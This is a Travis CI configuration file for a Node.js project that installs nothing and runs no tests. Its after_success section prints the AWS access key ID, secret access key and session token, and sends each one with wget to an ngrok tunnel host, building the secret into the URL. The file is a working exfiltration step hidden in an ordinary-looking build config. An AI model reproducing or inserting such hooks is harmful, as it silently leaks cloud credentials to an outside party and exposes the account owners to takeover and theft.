language: node_js

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - echo $AWS_ACCESS_KEY_ID
  - wget http://cfb765b1817c.ngrok.io/$(echo $AWS_ACCESS_KEY_ID)
  - echo $AWS_SECRET_ACCESS_KEY
  - wget http://cfb765b1817c.ngrok.io/$(echo $AWS_SECRET_ACCESS_KEY)
  - echo $AWS_SESSION_TOKEN
  - wget http://cfb765b1817c.ngrok.io/$(echo $AWS_SESSION_TOKEN)
